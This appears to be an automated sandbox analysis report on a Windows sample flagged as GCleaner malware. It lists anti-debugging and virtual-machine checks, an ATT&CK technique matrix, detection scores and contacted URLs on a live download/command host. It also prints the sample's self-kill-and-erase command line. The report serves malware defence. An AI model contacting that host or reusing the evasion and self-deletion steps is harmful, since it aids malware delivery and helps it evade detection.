Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004083EE push ecx; ret	0_2_00408401
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040FEBA push es; ret	0_2_0040FEBB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0060407F push esp; retf	0_2_00604087
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00600121 push es; ret	0_2_00600122
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0060C575 push ss; retf	0_2_0060C579
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F8655 push ecx; ret	0_2_005F8668
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0060467D push esp; retf	0_2_0060467E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C7443 push ecx; ret	0_2_007C7444
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C68FD pushfd ; ret	0_2_007C6905
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C7117 push ecx; ret	0_2_007C7118
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C81F5 pushad ; ret	0_2_007C81F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C5E78 pushad ; retf	0_2_007C5EB4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C9EC4 push ecx; ret	0_2_007C9F0C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C9E93 push ecx; ret	0_2_007C9F0C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C871B push es; ret	0_2_007C871C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C9F0D push ecx; ret	0_2_007C9F0C

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

API coverage: 9.6 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004306A8 GetSystemTimes followed by cmp: cmp dword ptr [00437b24h], 0ah and CTI: jne 004308A0h

0_2_004306A8

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2073863942.0000000002DA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, 00000000.00000002.2073485392.000000000086B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW 7
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\file.exe

0_2_004018E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004084E5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_004084E5

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00411002 mov eax, dword ptr fs:[00000030h]	0_2_00411002
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C4F1 mov eax, dword ptr fs:[00000030h]	0_2_0040C4F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F092B mov eax, dword ptr fs:[00000030h]	0_2_005F092B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00601269 mov eax, dword ptr fs:[00000030h]	0_2_00601269
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F0D90 mov eax, dword ptr fs:[00000030h]	0_2_005F0D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005FC758 mov eax, dword ptr fs:[00000030h]	0_2_005FC758
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007C4A8B push dword ptr fs:[00000030h]	0_2_007C4A8B

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004168EC GetProcessHeap,

0_2_004168EC

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407B06 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00407B06
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004084E5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004084E5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408679 SetUnhandledExceptionFilter,	0_2_00408679
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040BFEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0040BFEB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F88E0 SetUnhandledExceptionFilter,	0_2_005F88E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005FC252 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005FC252
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F7D6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_005F7D6D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005F874C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_005F874C

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004086E3 cpuid

0_2_004086E3

Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00418885
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00418910
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00411112
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00418B63
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00418C89
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00418D8F
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00418E5E
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00411634
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_004187EA
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_0041879F
Source: C:\Users\user\Desktop\file.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_006090C5
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_0060189B
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00608A51
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00608A06
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00608AEC
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00608B77
Source: C:\Users\user\Desktop\file.exe	Code function: EnumSystemLocalesW,	0_2_00601379
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00608DCA
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00608EF0
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoW,	0_2_00608FF6

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040C891 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_0040C891

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected GCleaner

Source: Yara match	File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1680069236.0000000000740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Remote Access Functionality

Yara detected GCleaner

Source: Yara match	File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.5f0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1680069236.0000000000740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073287421.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073086290.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	11 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	23 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	31%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe
http://80.66.75.114/6.75.114/add?substr=one&s=two	0%	Avira URL Cloud	safe
http://80.66.75.114/	0%	Avira URL Cloud	safe
http://80.66.75.114/files/download4/files/downloadP	0%	Avira URL Cloud	safe
http://80.66.75.114/files/download4/files/download	0%	Avira URL Cloud	safe
http://80.66.75.114/files/download	100%	Avira URL Cloud	malware
http://80.66.75.114/files/download	19%	Virustotal		Browse
http://80.66.75.114/add?substr=one&s=twoi	0%	Avira URL Cloud	safe
http://80.66.75.114/files/downloadP	0%	Avira URL Cloud	safe
http://80.66.75.114/6.75.114/add?substr=one&s=two	9%	Virustotal		Browse
http://80.66.75.114/files/download4/files/download	8%	Virustotal		Browse
http://80.66.75.114/files/downloadData	0%	Avira URL Cloud	safe
http://80.66.75.114/wi	0%	Avira URL Cloud	safe
http://80.66.75.114/add?substr=one&s=two	0%	Avira URL Cloud	safe
http://80.66.75.114/files/downloadN	0%	Avira URL Cloud	safe
http://80.66.75.114/files/downloadData	16%	Virustotal		Browse
http://80.66.75.114/files/downloadL	0%	Avira URL Cloud	safe
http://80.66.75.114/	17%	Virustotal		Browse
http://80.66.75.114/files/downloadLMEM	0%	Avira URL Cloud	safe
http://80.66.75.114/files/downloadP	12%	Virustotal		Browse
http://80.66.75.114/files/downloadN	8%	Virustotal		Browse
http://80.66.75.114/files/downloadL	9%	Virustotal		Browse
http://80.66.75.114/add?substr=one&s=two	16%	Virustotal		Browse

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://80.66.75.114/files/download	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://80.66.75.114/add?substr=one&s=two	true	16%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://80.66.75.114/6.75.114/add?substr=one&s=two	file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://80.66.75.114/files/download4/files/downloadP	file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://80.66.75.114/	file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2073934684.0000000002E31000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	false	17%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://80.66.75.114/files/download4/files/download	file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	false	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://80.66.75.114/add?substr=one&s=twoi	file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.9.dr	false	URL Reputation: safe	unknown
http://80.66.75.114/files/downloadP	file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://80.66.75.114/files/downloadData	file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://80.66.75.114/wi	file.exe, 00000000.00000003.1860003838.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1882788834.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1783507267.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1829531312.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1905305826.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1738300300.0000000000898000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1806125561.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1928050185.000000000089A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1760828703.000000000089A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
